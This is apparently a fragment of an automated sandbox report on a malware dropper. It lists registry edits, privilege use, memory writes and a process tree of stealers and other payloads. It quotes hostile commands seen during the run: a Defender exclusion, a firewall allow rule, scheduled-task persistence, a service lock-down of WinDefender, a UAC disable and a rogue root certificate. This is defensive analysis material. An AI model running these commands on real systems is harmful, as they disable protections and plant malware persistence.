Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe -
Processes:
keks.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 keks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
amers.exeaxplons.exetrf.exeredline1.exeRegAsm.exeaxplons.exekeks.exepowershell.exew2eZW3DpjD8Wm4ZLMB9QEm0V.exepowershell.exepowershell.exebti7iaMBgV4UC96BWBjacHN6.exeOR27MElvsSr4pubuwCN6eSHH.exepowershell.exeOR27MElvsSr4pubuwCN6eSHH.exepowershell.exepowershell.exepowershell.exepid process 3056 amers.exe 3056 amers.exe 1640 axplons.exe 1640 axplons.exe 4016 trf.exe 4016 trf.exe 2776 redline1.exe 2776 redline1.exe 3036 RegAsm.exe 3036 RegAsm.exe 2776 redline1.exe 2776 redline1.exe 2776 redline1.exe 2776 redline1.exe 3036 RegAsm.exe 3036 RegAsm.exe 4628 axplons.exe 4628 axplons.exe 3956 keks.exe 3956 keks.exe 3956 keks.exe 3956 keks.exe 3956 keks.exe 1868 powershell.exe 1868 powershell.exe 1868 powershell.exe 1916 w2eZW3DpjD8Wm4ZLMB9QEm0V.exe 1916 w2eZW3DpjD8Wm4ZLMB9QEm0V.exe 1916 w2eZW3DpjD8Wm4ZLMB9QEm0V.exe 1916 w2eZW3DpjD8Wm4ZLMB9QEm0V.exe 4932 powershell.exe 4932 powershell.exe 4636 powershell.exe 4636 powershell.exe 4932 powershell.exe 4636 powershell.exe 4968 bti7iaMBgV4UC96BWBjacHN6.exe 4968 bti7iaMBgV4UC96BWBjacHN6.exe 836 OR27MElvsSr4pubuwCN6eSHH.exe 836 OR27MElvsSr4pubuwCN6eSHH.exe 3732 powershell.exe 3732 powershell.exe 3732 powershell.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 4768 powershell.exe 4768 powershell.exe 4768 powershell.exe 4968 bti7iaMBgV4UC96BWBjacHN6.exe 4968 bti7iaMBgV4UC96BWBjacHN6.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2108 powershell.exe 2108 powershell.exe 2108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
Processes:
trf.exe445001.exeredline1.exekeks.exefile300un.exeRegAsm.exeregsvcs.exepowershell.exew2eZW3DpjD8Wm4ZLMB9QEm0V.exepowershell.exepowershell.exetaskkill.exebti7iaMBgV4UC96BWBjacHN6.exeOR27MElvsSr4pubuwCN6eSHH.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4016 trf.exe Token: SeBackupPrivilege 4016 trf.exe Token: SeSecurityPrivilege 4016 trf.exe Token: SeSecurityPrivilege 4016 trf.exe Token: SeSecurityPrivilege 4016 trf.exe Token: SeSecurityPrivilege 4016 trf.exe Token: SeLockMemoryPrivilege 3892 445001.exe Token: SeDebugPrivilege 2776 redline1.exe Token: SeDebugPrivilege 3956 keks.exe Token: SeDebugPrivilege 4004 file300un.exe Token: SeDebugPrivilege 4516 RegAsm.exe Token: SeDebugPrivilege 4504 regsvcs.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeManageVolumePrivilege 1916 w2eZW3DpjD8Wm4ZLMB9QEm0V.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 4636 powershell.exe Token: SeDebugPrivilege 4016 taskkill.exe Token: SeDebugPrivilege 4968 bti7iaMBgV4UC96BWBjacHN6.exe Token: SeImpersonatePrivilege 4968 bti7iaMBgV4UC96BWBjacHN6.exe Token: SeDebugPrivilege 836 OR27MElvsSr4pubuwCN6eSHH.exe Token: SeImpersonatePrivilege 836 OR27MElvsSr4pubuwCN6eSHH.exe Token: SeDebugPrivilege 3732 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 4968 bti7iaMBgV4UC96BWBjacHN6.exe Token: SeImpersonatePrivilege 4968 bti7iaMBgV4UC96BWBjacHN6.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2108 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
445001.exepid process 3892 445001.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exeexplorku.exeamers.exeaxplons.exealex.exeRegAsm.execrypted333.exeinstall.execmd.exedescription pid process target process PID 2940 wrote to memory of 2792 2940 9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe explorku.exe PID 2940 wrote to memory of 2792 2940 9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe explorku.exe PID 2940 wrote to memory of 2792 2940 9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe explorku.exe PID 2792 wrote to memory of 4908 2792 explorku.exe explorku.exe PID 2792 wrote to memory of 4908 2792 explorku.exe explorku.exe PID 2792 wrote to memory of 4908 2792 explorku.exe explorku.exe PID 2792 wrote to memory of 3056 2792 explorku.exe amers.exe PID 2792 wrote to memory of 3056 2792 explorku.exe amers.exe PID 2792 wrote to memory of 3056 2792 explorku.exe amers.exe PID 3056 wrote to memory of 1640 3056 amers.exe axplons.exe PID 3056 wrote to memory of 1640 3056 amers.exe axplons.exe PID 3056 wrote to memory of 1640 3056 amers.exe axplons.exe PID 2792 wrote to memory of 792 2792 explorku.exe 20d9aab82e.exe PID 2792 wrote to memory of 792 2792 explorku.exe 20d9aab82e.exe PID 2792 wrote to memory of 792 2792 explorku.exe 20d9aab82e.exe PID 1640 wrote to memory of 4824 1640 axplons.exe alex.exe PID 1640 wrote to memory of 4824 1640 axplons.exe alex.exe PID 1640 wrote to memory of 4824 1640 axplons.exe alex.exe PID 4824 wrote to memory of 4516 4824 alex.exe RegAsm.exe PID 4824 wrote to memory of 4516 4824 alex.exe RegAsm.exe PID 4824 wrote to memory of 4516 4824 alex.exe RegAsm.exe PID 4824 wrote to memory of 4516 4824 alex.exe RegAsm.exe PID 4824 wrote to memory of 4516 4824 alex.exe RegAsm.exe PID 4824 wrote to memory of 4516 4824 alex.exe RegAsm.exe PID 4824 wrote to memory of 4516 4824 alex.exe RegAsm.exe PID 4824 wrote to memory of 4516 4824 alex.exe RegAsm.exe PID 1640 wrote to memory of 3276 1640 axplons.exe crypted333.exe PID 1640 wrote to memory of 3276 1640 axplons.exe crypted333.exe PID 1640 wrote to memory of 3276 1640 axplons.exe crypted333.exe PID 4516 wrote to memory of 3956 4516 RegAsm.exe keks.exe PID 4516 wrote to memory of 3956 4516 RegAsm.exe keks.exe PID 4516 wrote to memory of 3956 4516 RegAsm.exe keks.exe PID 4516 wrote to memory of 4016 4516 RegAsm.exe trf.exe PID 4516 wrote to memory of 4016 4516 RegAsm.exe trf.exe PID 3276 wrote to memory of 2372 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 2372 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 2372 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 3276 wrote to memory of 5028 3276 crypted333.exe RegAsm.exe PID 1640 wrote to memory of 2776 1640 axplons.exe redline1.exe PID 1640 wrote to memory of 2776 1640 axplons.exe redline1.exe PID 1640 wrote to memory of 2776 1640 axplons.exe redline1.exe PID 1640 wrote to memory of 3380 1640 axplons.exe install.exe PID 1640 wrote to memory of 3380 1640 axplons.exe install.exe PID 1640 wrote to memory of 3380 1640 axplons.exe install.exe PID 3380 wrote to memory of 3924 3380 install.exe cmd.exe PID 3380 wrote to memory of 3924 3380 install.exe cmd.exe PID 3380 wrote to memory of 3924 3380 install.exe cmd.exe PID 3924 wrote to memory of 1528 3924 cmd.exe sc.exe PID 3924 wrote to memory of 1528 3924 cmd.exe sc.exe PID 3924 wrote to memory of 1528 3924 cmd.exe sc.exe PID 3924 wrote to memory of 1008 3924 cmd.exe GameService.exe PID 3924 wrote to memory of 1008 3924 cmd.exe GameService.exe PID 3924 wrote to memory of 1008 3924 cmd.exe GameService.exe PID 3924 wrote to memory of 4992 3924 cmd.exe GameService.exe PID 3924 wrote to memory of 4992 3924 cmd.exe GameService.exe PID 3924 wrote to memory of 4992 3924 cmd.exe GameService.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe"C:\Users\Admin\AppData\Local\Temp\9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956 -
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"7⤵PID:2508
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 38⤵PID:2032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 3646⤵
- Program crash
PID:4448 -
C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:2372
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameStabilityService\installm.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks7⤵
- Launches sc.exe
PID:1528 -
C:\Program Files (x86)\GameStabilityService\GameService.exeGameService remove GameSyncLinks confirm7⤵
- Executes dropped EXE
PID:1008 -
C:\Program Files (x86)\GameStabilityService\GameService.exeGameService install GameStabilityService "C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe"7⤵
- Executes dropped EXE
PID:4992 -
C:\Program Files (x86)\GameStabilityService\GameService.exeGameService start GameStabilityService7⤵
- Executes dropped EXE
PID:4720 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "6⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2284 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1256 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:932
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:1900
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"5⤵
- Executes dropped EXE
PID:2376 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F6⤵
- Creates scheduled task(s)
PID:976 -
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"5⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:4004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4504 -
C:\Users\Admin\Pictures\2UHJ6uEjwN1megUBNK5uha5D.exe"C:\Users\Admin\Pictures\2UHJ6uEjwN1megUBNK5uha5D.exe"7⤵
- Executes dropped EXE
PID:1136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 4928⤵
- Program crash
PID:692 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 4688⤵
- Program crash
PID:2144 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 7808⤵
- Program crash
PID:3068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 7888⤵
- Program crash
PID:1804 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 7888⤵
- Program crash
PID:400 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 8928⤵
- Program crash
PID:908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 8128⤵
- Program crash
PID:4296 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 10968⤵
- Program crash
PID:3048 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 14488⤵
- Program crash
PID:564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "2UHJ6uEjwN1megUBNK5uha5D.exe" /f & erase "C:\Users\Admin\Pictures\2UHJ6uEjwN1megUBNK5uha5D.exe" & exit8⤵PID:1328
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2UHJ6uEjwN1megUBNK5uha5D.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4016 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 14408⤵
- Program crash
PID:644 -
C:\Users\Admin\Pictures\OR27MElvsSr4pubuwCN6eSHH.exe"C:\Users\Admin\Pictures\OR27MElvsSr4pubuwCN6eSHH.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932 -
C:\Users\Admin\Pictures\OR27MElvsSr4pubuwCN6eSHH.exe"C:\Users\Admin\Pictures\OR27MElvsSr4pubuwCN6eSHH.exe"8⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"9⤵PID:5088
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes10⤵
- Modifies Windows Firewall
PID:3800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe9⤵PID:1436
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile10⤵
- Command and Scripting Interpreter: PowerShell
PID:4288 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F10⤵
- Creates scheduled task(s)
PID:4292 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f10⤵PID:4508
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:2108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile10⤵
- Command and Scripting Interpreter: PowerShell
PID:1976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile10⤵
- Command and Scripting Interpreter: PowerShell
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll10⤵PID:4752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:3800
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F10⤵
- Creates scheduled task(s)
PID:2232 -
C:\Windows\windefender.exe"C:\Windows\windefender.exe"10⤵PID:2532
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)11⤵PID:4636
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)12⤵
- Launches sc.exe
PID:2568 -
C:\Users\Admin\Pictures\w2eZW3DpjD8Wm4ZLMB9QEm0V.exe"C:\Users\Admin\Pictures\w2eZW3DpjD8Wm4ZLMB9QEm0V.exe" /s7⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Users\Admin\Pictures\bti7iaMBgV4UC96BWBjacHN6.exe"C:\Users\Admin\Pictures\bti7iaMBgV4UC96BWBjacHN6.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636 -
C:\Users\Admin\Pictures\bti7iaMBgV4UC96BWBjacHN6.exe"C:\Users\Admin\Pictures\bti7iaMBgV4UC96BWBjacHN6.exe"8⤵
- Executes dropped EXE
PID:232 -
